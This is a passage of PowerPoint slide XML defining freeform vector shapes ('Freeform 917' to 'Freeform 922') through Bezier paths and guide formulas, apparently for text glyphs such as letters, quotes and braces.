                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="304"/>
                    <a:pt x="232" y="235"/>
                    <a:pt x="232" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="75"/>
                    <a:pt x="189" y="0"/>
                    <a:pt x="123" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="66" y="274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="30"/>
                    <a:pt x="198" y="97"/>
                    <a:pt x="198" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="213"/>
                    <a:pt x="169" y="274"/>
                    <a:pt x="114" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="27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76" name="Freeform 917">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41553661-3EF6-431A-84EC-A8C408175415}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId93"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6330951" y="2108201"/>
              <a:ext cx="80963" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 144 w 235"/>
                <a:gd name="T1" fmla="*/ 19 h 310"/>
                <a:gd name="T2" fmla="*/ 117 w 235"/>
                <a:gd name="T3" fmla="*/ 0 h 310"/>
                <a:gd name="T4" fmla="*/ 91 w 235"/>
                <a:gd name="T5" fmla="*/ 19 h 310"/>
                <a:gd name="T6" fmla="*/ 30 w 235"/>
                <a:gd name="T7" fmla="*/ 280 h 310"/>
                <a:gd name="T8" fmla="*/ 9 w 235"/>
                <a:gd name="T9" fmla="*/ 281 h 310"/>
                <a:gd name="T10" fmla="*/ 0 w 235"/>
                <a:gd name="T11" fmla="*/ 295 h 310"/>
                <a:gd name="T12" fmla="*/ 22 w 235"/>
                <a:gd name="T13" fmla="*/ 310 h 310"/>
                <a:gd name="T14" fmla="*/ 73 w 235"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 94 w 235"/>
                <a:gd name="T17" fmla="*/ 295 h 310"/>
                <a:gd name="T18" fmla="*/ 66 w 235"/>
                <a:gd name="T19" fmla="*/ 280 h 310"/>
                <a:gd name="T20" fmla="*/ 77 w 235"/>
                <a:gd name="T21" fmla="*/ 228 h 310"/>
                <a:gd name="T22" fmla="*/ 158 w 235"/>
                <a:gd name="T23" fmla="*/ 228 h 310"/>
                <a:gd name="T24" fmla="*/ 169 w 235"/>
                <a:gd name="T25" fmla="*/ 280 h 310"/>
                <a:gd name="T26" fmla="*/ 141 w 235"/>
                <a:gd name="T27" fmla="*/ 295 h 310"/>
                <a:gd name="T28" fmla="*/ 162 w 235"/>
                <a:gd name="T29" fmla="*/ 310 h 310"/>
                <a:gd name="T30" fmla="*/ 213 w 235"/>
                <a:gd name="T31" fmla="*/ 310 h 310"/>
                <a:gd name="T32" fmla="*/ 235 w 235"/>
                <a:gd name="T33" fmla="*/ 295 h 310"/>
                <a:gd name="T34" fmla="*/ 226 w 235"/>
                <a:gd name="T35" fmla="*/ 282 h 310"/>
                <a:gd name="T36" fmla="*/ 205 w 235"/>
                <a:gd name="T37" fmla="*/ 280 h 310"/>
                <a:gd name="T38" fmla="*/ 144 w 235"/>
                <a:gd name="T39" fmla="*/ 19 h 310"/>
                <a:gd name="T40" fmla="*/ 117 w 235"/>
                <a:gd name="T41" fmla="*/ 40 h 310"/>
                <a:gd name="T42" fmla="*/ 118 w 235"/>
                <a:gd name="T43" fmla="*/ 40 h 310"/>
                <a:gd name="T44" fmla="*/ 150 w 235"/>
                <a:gd name="T45" fmla="*/ 198 h 310"/>
                <a:gd name="T46" fmla="*/ 85 w 235"/>
                <a:gd name="T47" fmla="*/ 198 h 310"/>
                <a:gd name="T48" fmla="*/ 117 w 235"/>
                <a:gd name="T49" fmla="*/ 4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310">
                  <a:moveTo>
                    <a:pt x="144" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="0"/>
                    <a:pt x="133" y="0"/>
                    <a:pt x="117" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="95" y="0"/>
                    <a:pt x="91" y="19"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="280"/>
                    <a:pt x="12" y="280"/>
                    <a:pt x="9" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="284"/>
                    <a:pt x="0" y="289"/>
                    <a:pt x="0" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="310"/>
                    <a:pt x="13" y="310"/>
                    <a:pt x="22" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="310"/>
                    <a:pt x="94" y="310"/>
                    <a:pt x="94" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="280"/>
                    <a:pt x="84" y="280"/>
                    <a:pt x="66" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="280"/>
                    <a:pt x="141" y="280"/>
                    <a:pt x="141" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="310"/>
                    <a:pt x="153" y="310"/>
                    <a:pt x="162" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="213" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="310"/>
                    <a:pt x="235" y="310"/>
                    <a:pt x="235" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="289"/>
                    <a:pt x="232" y="284"/>
                    <a:pt x="226" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="280"/>
                    <a:pt x="212" y="280"/>
                    <a:pt x="205" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="19"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="40"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="118" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117" y="4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77" name="Freeform 918">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF86D256-5C15-47BE-A81C-65502002C7A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId94"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6437313" y="2108201"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 28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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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78" name="Freeform 919">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82241AEE-4045-4AED-9FE0-D00E23D3A58F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId95"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6518276" y="2084388"/>
              <a:ext cx="61913" cy="176213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 177"/>
                <a:gd name="T1" fmla="*/ 433 h 499"/>
                <a:gd name="T2" fmla="*/ 4 w 177"/>
                <a:gd name="T3" fmla="*/ 488 h 499"/>
                <a:gd name="T4" fmla="*/ 0 w 177"/>
                <a:gd name="T5" fmla="*/ 494 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 177"/>
                <a:gd name="T7" fmla="*/ 499 h 499"/>
                <a:gd name="T8" fmla="*/ 105 w 177"/>
                <a:gd name="T9" fmla="*/ 437 h 499"/>
                <a:gd name="T10" fmla="*/ 105 w 177"/>
                <a:gd name="T11" fmla="*/ 323 h 499"/>
                <a:gd name="T12" fmla="*/ 125 w 177"/>
                <a:gd name="T13" fmla="*/ 271 h 499"/>
                <a:gd name="T14" fmla="*/ 172 w 177"/>
                <a:gd name="T15" fmla="*/ 255 h 499"/>
                <a:gd name="T16" fmla="*/ 177 w 177"/>
                <a:gd name="T17" fmla="*/ 250 h 499"/>
                <a:gd name="T18" fmla="*/ 169 w 177"/>
                <a:gd name="T19" fmla="*/ 244 h 499"/>
                <a:gd name="T20" fmla="*/ 106 w 177"/>
                <a:gd name="T21" fmla="*/ 200 h 499"/>
                <a:gd name="T22" fmla="*/ 105 w 177"/>
                <a:gd name="T23" fmla="*/ 175 h 499"/>
                <a:gd name="T24" fmla="*/ 105 w 177"/>
                <a:gd name="T25" fmla="*/ 77 h 499"/>
                <a:gd name="T26" fmla="*/ 81 w 177"/>
                <a:gd name="T27" fmla="*/ 21 h 499"/>
                <a:gd name="T28" fmla="*/ 10 w 177"/>
                <a:gd name="T29" fmla="*/ 0 h 499"/>
                <a:gd name="T30" fmla="*/ 0 w 177"/>
                <a:gd name="T31" fmla="*/ 6 h 499"/>
                <a:gd name="T32" fmla="*/ 8 w 177"/>
                <a:gd name="T33" fmla="*/ 11 h 499"/>
                <a:gd name="T34" fmla="*/ 70 w 177"/>
                <a:gd name="T35" fmla="*/ 55 h 499"/>
                <a:gd name="T36" fmla="*/ 72 w 177"/>
                <a:gd name="T37" fmla="*/ 78 h 499"/>
                <a:gd name="T38" fmla="*/ 72 w 177"/>
                <a:gd name="T39" fmla="*/ 183 h 499"/>
                <a:gd name="T40" fmla="*/ 92 w 177"/>
                <a:gd name="T41" fmla="*/ 230 h 499"/>
                <a:gd name="T42" fmla="*/ 130 w 177"/>
                <a:gd name="T43" fmla="*/ 250 h 499"/>
                <a:gd name="T44" fmla="*/ 72 w 177"/>
                <a:gd name="T45" fmla="*/ 313 h 499"/>
                <a:gd name="T46" fmla="*/ 72 w 177"/>
                <a:gd name="T47" fmla="*/ 43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7" h="499">
                  <a:moveTo>
                    <a:pt x="72" y="433"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="453"/>
                    <a:pt x="59" y="485"/>
                    <a:pt x="4" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="489"/>
                    <a:pt x="0" y="491"/>
                    <a:pt x="0" y="494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="499"/>
                    <a:pt x="5" y="499"/>
                    <a:pt x="10" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="499"/>
                    <a:pt x="105" y="475"/>
                    <a:pt x="105" y="437"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="304"/>
                    <a:pt x="105" y="288"/>
                    <a:pt x="125" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="257"/>
                    <a:pt x="161" y="256"/>
                    <a:pt x="172" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="255"/>
                    <a:pt x="177" y="253"/>
                    <a:pt x="177" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="245"/>
                    <a:pt x="174" y="245"/>
                    <a:pt x="169" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="242"/>
                    <a:pt x="112" y="224"/>
                    <a:pt x="106" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="194"/>
                    <a:pt x="105" y="193"/>
                    <a:pt x="105" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="56"/>
                    <a:pt x="105" y="40"/>
                    <a:pt x="81" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="5"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="3" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="13"/>
                    <a:pt x="64" y="29"/>
                    <a:pt x="70" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="59"/>
                    <a:pt x="72" y="60"/>
                    <a:pt x="72" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="206"/>
                    <a:pt x="76" y="214"/>
                    <a:pt x="92" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="241"/>
                    <a:pt x="116" y="246"/>
                    <a:pt x="130" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="261"/>
                    <a:pt x="72" y="284"/>
                    <a:pt x="72" y="313"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="43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79" name="Freeform 920">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02845609-E30E-42F0-BD70-4FFB7A0D1801}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId96"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6605588" y="2084388"/>
              <a:ext cx="60325" cy="176213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 177"/>
                <a:gd name="T1" fmla="*/ 433 h 499"/>
                <a:gd name="T2" fmla="*/ 4 w 177"/>
                <a:gd name="T3" fmla="*/ 488 h 499"/>
                <a:gd name="T4" fmla="*/ 0 w 177"/>
                <a:gd name="T5" fmla="*/ 494 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 177"/>
                <a:gd name="T7" fmla="*/ 499 h 499"/>
                <a:gd name="T8" fmla="*/ 105 w 177"/>
                <a:gd name="T9" fmla="*/ 437 h 499"/>
                <a:gd name="T10" fmla="*/ 105 w 177"/>
                <a:gd name="T11" fmla="*/ 323 h 499"/>
                <a:gd name="T12" fmla="*/ 125 w 177"/>
                <a:gd name="T13" fmla="*/ 271 h 499"/>
                <a:gd name="T14" fmla="*/ 172 w 177"/>
                <a:gd name="T15" fmla="*/ 255 h 499"/>
                <a:gd name="T16" fmla="*/ 177 w 177"/>
                <a:gd name="T17" fmla="*/ 250 h 499"/>
                <a:gd name="T18" fmla="*/ 169 w 177"/>
                <a:gd name="T19" fmla="*/ 244 h 499"/>
                <a:gd name="T20" fmla="*/ 107 w 177"/>
                <a:gd name="T21" fmla="*/ 200 h 499"/>
                <a:gd name="T22" fmla="*/ 105 w 177"/>
                <a:gd name="T23" fmla="*/ 175 h 499"/>
                <a:gd name="T24" fmla="*/ 105 w 177"/>
                <a:gd name="T25" fmla="*/ 77 h 499"/>
                <a:gd name="T26" fmla="*/ 81 w 177"/>
                <a:gd name="T27" fmla="*/ 21 h 499"/>
                <a:gd name="T28" fmla="*/ 10 w 177"/>
                <a:gd name="T29" fmla="*/ 0 h 499"/>
                <a:gd name="T30" fmla="*/ 0 w 177"/>
                <a:gd name="T31" fmla="*/ 6 h 499"/>
                <a:gd name="T32" fmla="*/ 8 w 177"/>
                <a:gd name="T33" fmla="*/ 11 h 499"/>
                <a:gd name="T34" fmla="*/ 70 w 177"/>
                <a:gd name="T35" fmla="*/ 55 h 499"/>
                <a:gd name="T36" fmla="*/ 72 w 177"/>
                <a:gd name="T37" fmla="*/ 78 h 499"/>
                <a:gd name="T38" fmla="*/ 72 w 177"/>
                <a:gd name="T39" fmla="*/ 183 h 499"/>
                <a:gd name="T40" fmla="*/ 92 w 177"/>
                <a:gd name="T41" fmla="*/ 230 h 499"/>
                <a:gd name="T42" fmla="*/ 131 w 177"/>
                <a:gd name="T43" fmla="*/ 250 h 499"/>
                <a:gd name="T44" fmla="*/ 72 w 177"/>
                <a:gd name="T45" fmla="*/ 313 h 499"/>
                <a:gd name="T46" fmla="*/ 72 w 177"/>
                <a:gd name="T47" fmla="*/ 43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7" h="499">
                  <a:moveTo>
                    <a:pt x="72" y="433"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="453"/>
                    <a:pt x="59" y="485"/>
                    <a:pt x="4" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="489"/>
                    <a:pt x="0" y="491"/>
                    <a:pt x="0" y="494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="499"/>
                    <a:pt x="5" y="499"/>
                    <a:pt x="10" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="499"/>
                    <a:pt x="105" y="475"/>
                    <a:pt x="105" y="437"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="304"/>
                    <a:pt x="105" y="288"/>
                    <a:pt x="125" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="257"/>
                    <a:pt x="161" y="256"/>
                    <a:pt x="172" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="255"/>
                    <a:pt x="177" y="253"/>
                    <a:pt x="177" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="245"/>
                    <a:pt x="174" y="245"/>
                    <a:pt x="169" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="242"/>
                    <a:pt x="112" y="224"/>
                    <a:pt x="107" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="194"/>
                    <a:pt x="105" y="193"/>
                    <a:pt x="105" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="56"/>
                    <a:pt x="105" y="40"/>
                    <a:pt x="81" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="5"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="3" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="13"/>
                    <a:pt x="64" y="29"/>
                    <a:pt x="70" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="59"/>
                    <a:pt x="72" y="60"/>
                    <a:pt x="72" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="206"/>
                    <a:pt x="76" y="214"/>
                    <a:pt x="92" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="241"/>
                    <a:pt x="117" y="246"/>
                    <a:pt x="131" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="261"/>
                    <a:pt x="72" y="284"/>
                    <a:pt x="72" y="313"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="43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80" name="Freeform 921">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A57679-F04F-42CE-90C6-1220F044072C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId97"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6708776" y="2193926"/>
              <a:ext cx="30163" cy="47625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 41 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 62 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17" fmla="*/ 6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32">
                  <a:moveTo>
                    <a:pt x="51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="103"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="123"/>
                    <a:pt x="7" y="132"/>
                    <a:pt x="16" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="132"/>
                    <a:pt x="83" y="105"/>
                    <a:pt x="83" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="20"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="41" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="10" y="15"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="24" y="62"/>
                    <a:pt x="41" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="62"/>
                    <a:pt x="47" y="62"/>
                    <a:pt x="51" y="6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81" name="Freeform 922">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{866F2127-221E-40C2-AF7B-1B570A9EAF8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
